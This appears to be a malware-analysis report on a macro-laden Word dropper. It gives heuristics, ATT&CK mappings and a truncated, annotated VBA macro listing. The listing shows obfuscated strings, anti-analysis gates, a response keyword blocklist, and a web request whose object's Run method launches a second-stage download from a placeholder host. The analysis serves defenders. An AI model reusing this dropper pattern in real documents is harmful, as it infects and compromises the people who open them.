MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains VBA macros and a 'CreateObject' call, indicative of malicious intent. It also includes a lure to enable macros, a common tactic for malware droppers. The VBA script attempts to download and execute a second-stage payload from a constructed URL, which is obfuscated but appears to be 'http://m.example.com/win/malware.exe'.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6430108-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6430108-0
-
VBA macros detected — medium (1 related finding) — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
Macro/content-enable lure — medium — SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). (This is the standard OOXML DrawingML namespace identifier present in ordinary Office files, not a network destination; the second-stage URL mentioned in the summary comes from the macro, not from this finding.)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256 89ca7c9a8d4a235f8fce4b6afc6d2f29543e4330fdc5fef6fc0cde5dbf2b1e90) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7958 bytes |
Preview script — first 1,000 lines of the extracted script (the copy shown below stops at the "... (truncated)" marker).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module attributes as decoded by olevba; VB_Name "ThisDocument" is the
' document-level module of the Word file. PRaKyjM is a module-scoped flag that VhlGqZ
' sets on its first call, so the rest of the chain executes only once per session.
Dim PRaKyjM As Boolean
' Entry point of the chain. The (Long, IInkRectangle) signature looks like an event-handler
' binding, but which control or event wires it up is not visible in this preview — confirm
' from the full module. Its only action is to call VhlGqZ.
Public Sub Kophy_Painted(ByVal CVzmc As Long, ByVal KXjoOyz As IInkRectangle)
VhlGqZ
End Sub
' Run-once guard: exits immediately if the module flag PRaKyjM is already set, otherwise
' sets it and hands off to CpRHiT. Repeated firings of the entry point are therefore no-ops.
Public Sub VhlGqZ()
If PRaKyjM Then Exit Sub
PRaKyjM = True
CpRHiT
End Sub
' Orchestrator. "On Error GoTo naItg" means any error raised inside the five guard calls
' (dXiGc and CTcpAe visibly raise Error 101/105/106 on failure) jumps to the empty label
' naItg and the Sub ends silently, so the CreateObject/Run lines run only when every guard
' passes. FaHPqxZ, xHoVxqt, RprcZ, zXBNP, IfGeql and TGTuMO are not in this preview, so
' what they check or decode cannot be confirmed from here.
Public Sub CpRHiT()
On Error GoTo naItg
FaHPqxZ
dXiGc
xHoVxqt
RprcZ
CTcpAe
' The ProgID passed to CreateObject is the string decoded by blEkIw (not shown decoded here);
' the resulting object exposes a Run method, called with a second argument of 0. The report
' summary attributes the download-and-execute of the second stage to this path.
Set EzUIwz = zXBNP(CreateObject(blEkIw))
IfGeql EzUIwz.Run(TGTuMO, 0)
Exit Sub
naItg:
End Sub
' Response gate. Fetches text via KNOufK, then raises Error 105 unless it contains the
' string decoded from a("LoWAOENAxjsbCAI", 98, 139) (case-insensitive, via padmwQL), and
' Error 106 if it contains any entry of the LyTBu list (via cHKFVJ). Either error unwinds to
' CpRHiT's handler and aborts the chain. The decoded values are not shown in this preview,
' so what the response is being checked for is unconfirmed — TODO recover a().
Public Sub CTcpAe()
ecuxFoK = KNOufK
If Not padmwQL(ecuxFoK, a("LoWAOENAxjsbCAI", 98, 139)) Then Error 105
If cHKFVJ(ecuxFoK, LyTBu) Then Error 106
End Sub
' Performs one web request and returns its body. The object is created from a string
' decoded by a(); the members used (Open, SetRequestHeader, Send, Status, ResponseText)
' are those of an XMLHTTP-style request object, but the actual ProgID is not visible here.
' Open's three positional arguments come from NlGWd, rUNcKU and qXVeFZk (False); if this is
' an XMLHTTP object they would be method, URL and async flag — confirm after decoding.
' Two request headers are set: name/value from DMlFVK and vicWYgz, then a second pair from
' two more decoded literals (their character content is consistent with a User-Agent
' header, unconfirmed). bAHiGQC merely discards the method return values.
' Returns ResponseText on HTTP status 200, otherwise the default empty string.
Public Function KNOufK() As String
Set xsJTL = CreateObject(a("qnHN5einr.RWiCtp.WxstpjiettC1uHtt.", 131, 221))
bAHiGQC xsJTL.Open(NlGWd, rUNcKU, qXVeFZk)
bAHiGQC xsJTL.SetRequestHeader(DMlFVK, vicWYgz)
bAHiGQC xsJTL.SetRequestHeader(a("A-resUQUbvreGJtneg", 35, 41), a("S 0WdsT. in5)OiMia.(mtl I7;io 0Tdt.sSPol/0cpieME. nwN6;re/0nPszl4 oab;", 521, 583))
bAHiGQC xsJTL.Send
If xsJTL.Status = 200 Then
KNOufK = xsJTL.ResponseText
End If
End Function
' Decoded string used as the header NAME in the first SetRequestHeader call of KNOufK.
' The plaintext is not available in this preview (decoder a() is outside it).
Public Function DMlFVK() As String
DMlFVK = a("LrerefeRzFcHiOP", 89, 22)
End Function
' Decoded string used as the header VALUE in the first SetRequestHeader call of KNOufK.
' The literal contains ':' and '/' characters, consistent with a URL-shaped value —
' unconfirmed until a() is recovered.
Public Function vicWYgz() As String
vicWYgz = a("mnpYwmyP/.espicdha/-Qw/-u/c-ssnartxlaM.eiWwomQ:dtetmodz", 567, 126)
End Function
' Decoded string passed as the second argument to Open in KNOufK (the URL position for an
' XMLHTTP-style object). The report summary identifies the obfuscated request target as
' 'http://m.example.com/win/malware.exe'; presumably this is that value — not verifiable
' from the preview alone.
Public Function rUNcKU() As String
rUNcKU = a("/ct.aTe/tdav.z/scixpwmot1xmo/y.h2mkg:ino/wemp/mSiw", 121, 531)
End Function
' Constant False, passed as the third argument to Open in KNOufK (the async flag position
' for an XMLHTTP-style object, i.e. a blocking request — confirm once the ProgID is known).
Public Function qXVeFZk() As Boolean
qXVeFZk = False
End Function
' Decoded string passed as the first argument to Open in KNOufK (the HTTP method position
' for an XMLHTTP-style object). Plaintext not recoverable from this preview.
Public Function NlGWd() As String
NlGWd = a("EnVTcazkGcr", 102, 74)
End Function
' Case-insensitive "contains" test: True when WorbP occurs anywhere in UycGe.
' InStrRev returns 0 when the substring is absent, so "<> 0" means "found".
Public Function padmwQL(ByVal UycGe As String, ByVal WorbP As String) As Boolean
padmwQL = InStrRev(UCase(UycGe), UCase(WorbP)) <> 0
End Function
' "Contains any": True when at least one element of the collection ItmiOs occurs in UycGe
' (each tested with padmwQL, i.e. case-insensitively). Falls through to the Boolean default
' False when nothing matches; the match case is written as a GoTo to a label rather than a
' flag assignment.
Public Function cHKFVJ(ByVal UycGe As String, ByVal ItmiOs) As Boolean
For Each WorbP In ItmiOs
If padmwQL(UycGe, WorbP) Then GoTo xEhxX
Next
Exit Function
xEhxX:
cHKFVJ = True
End Function
' Deliberate no-op sink: KNOufK passes method return values to it so they can be called in
' statement position and discarded.
Public Sub bAHiGQC(ByVal rWUfq)
End Sub
Public Function LyTBu()
' Builds an Array of 50 strings, each decoded by a(), and passes the array through IfGeql
' (not in this preview) before returning it. CTcpAe raises Error 106 when any of these
' strings appears in the HTTP response, so this presumably acts as a keyword blocklist
' applied to the server reply — the plaintext entries are unknown without the decoder.
LyTBu = IfGeql(Array(a("wrrLotfnhc crpJIo", 88, 168), a("tONTsRLyeYOotCUngnHkGisNI E", 221, 265), a("llJqMtO UBqJZAAcE", 144, 26), a("eNhOxTIjOyPbRAuR", 153, 22), a("bmHtluavMVHrhKS", 149, 129), _
a("ToOlVYemaAkKRPkcWHsUCKBqB", 56, 172), a("xckXgeSRlopAXeACK", 21, 160), a("EJEToNqqarTdBCvRaW", 113, 191), a("wTsUrtFAHBniXAevA", 169, 90), a("toYVwhF CsZAPsj", 152, 16), _
a("Cg vBdOknRHeCGrixTM", 187, 93), a("GIshOWbsnToGsfd", 157, 93), a("mooUgoeNlaudyANSa", 107, 111), a("bpFZncXNOottefmirx", 43, 38), a("DEuDAuoidOEtSPcSL", 126, 88), _
a("rrpduTCBnyqIWeotMz", 31, 167), a("foisJFTpRoewoNbppf", 29, 141), a("gvMlgSbUaemerEAiSsO", 49, 192), a("EzSVCCwEeCbLrr", 89, 16), a("sErBLllNBGLops ,Te", 197, 163), _
a("wafIentCMXRxvO", 25, 47), a("SEMgAtcIDAwAmxGf", 133, 162), a("iXaneSazoFKmoe", 145, 104), a("EcGNAdISaRamkdMc", 171, 36), a(" scqeDnUTOeDrATTGai", 135, 201), _
a("vkjGrYILATiPSoHe", 143, 62), a("odbcBujMlWDEN", 96, 133), a("AVOneIstYOEffRfj", 99, 65), a("ZLdLfreNzTeHbaf", 104, 116), a("EdzdSuCKALLceFR", 32, 77), _
a("seTiCrsftHnqtMOd", 103, 55), a("olQhrEcnXodRALu", 142, 82), a("rleIeOyueSvFcie", 17, 116), a("vPQenfdiOalOrDEETBj", 104, 207), a("PceCFMGfSINeXHw", 128, 158), _
a("ioeteMwPrrSDIsvNVtROAkAN", 157, 103), a(" pCEaAYCllFEtONCo", 157, 171), a("XACMGgnTRLYG", 67, 61), a("sohLLqhmiUSDet", 69, 100), a("AHiTAOceUlBCcYDw", 143, 122), _
a("isyTeUycWJutjRiQ", 163, 97), a("EmNrEvOgPLrMrYFRtN", 143, 79), a("itsNRVVIujeCTNiRdY", 95, 80), a("czPvoCSOhgFEi", 20, 70), a("eavpnAJrCQDttQyEDf", 187, 106), _
a("HsQdJyPf.HLepcIoEW", 185, 171), a("tlhrMFOcajeosJ", 65, 54), a("rHClilMtefoOCSgOV", 49, 40), a("YiwIMEzDneCjDBME", 151, 94), a("EeoBaPgSFIeiVwLn", 67, 110)))
End Function
' Decoded ProgID handed to CreateObject in CpRHiT; the object it yields is the one whose
' Run method launches the second stage. Plaintext not recoverable from this preview.
Public Function blEkIw() As String
blEkIw = a("qc.laStluWpeNEihHTrSG", 227, 51)
End Function
' Numeric guard: raises Error 101 (caught by CpRHiT, aborting the chain) when pdLnG is
' below pgpSg. pdLnG's definition begins where the preview is truncated and pgpSg is not
' shown, so what quantity is being compared is unknown — TODO confirm from the full module.
Public Sub dXiGc()
If pdLnG < pgpSg Then Error 101
End Sub
Public Function pdLnG() As Int
... (truncated)